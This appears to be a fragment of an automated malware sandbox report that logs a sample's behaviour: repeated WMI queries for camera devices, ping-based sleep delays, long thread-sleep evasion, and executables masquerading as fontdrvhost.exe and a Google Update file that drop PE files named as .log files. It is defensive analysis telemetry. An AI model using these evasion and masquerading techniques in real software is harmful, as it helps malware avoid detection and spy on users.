                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Uses ping.exe to sleep
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1A720000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeMemory allocated: 1A8D0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeMemory allocated: 1170000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeMemory allocated: 1AC30000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 840000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1A510000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1440000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1B1F0000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: E70000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeMemory allocated: 1A860000 memory reserve | memory write watch
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599765Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599546Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599326Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 599218Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 597062Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596953Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 596840Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599859Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599730Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 599297Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598969Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598840Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598718Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 598489Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597953Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597813Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597672Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597448Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597315Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 597078Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596968Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596859Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596748Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596636Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596516Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596391Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596266Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596155Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 596047Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595927Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595234Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595122Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 595008Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594635Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594505Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 594041Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593609Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 593109Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Drivers\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeWindow / User API: threadDelayed 4819Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWindow / User API: threadDelayed 5484Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeWindow / User API: threadDelayed 4198Jump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\PjHeJXVW.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\OwXMDaSq.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\beESemrN.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\lNXiOOwv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\UXZdmUkL.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\SvkCuJlg.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\rfCzNWvT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\LtQnCbUd.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\BoUXaXGR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\crKSmbgv.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\uNJXqjUH.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\rFAHquBj.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRcNKQWy.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeDropped PE file which has not been started: C:\Users\user\Desktop\rWShinUN.logJump to dropped file
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23806
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599874s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599765s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599656s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599546s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599437s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599326s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -599218s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -100000s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99891s >= -30000sJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exe TID: 1780Thread sleep time: -99782s >= -30000sJump to behavior
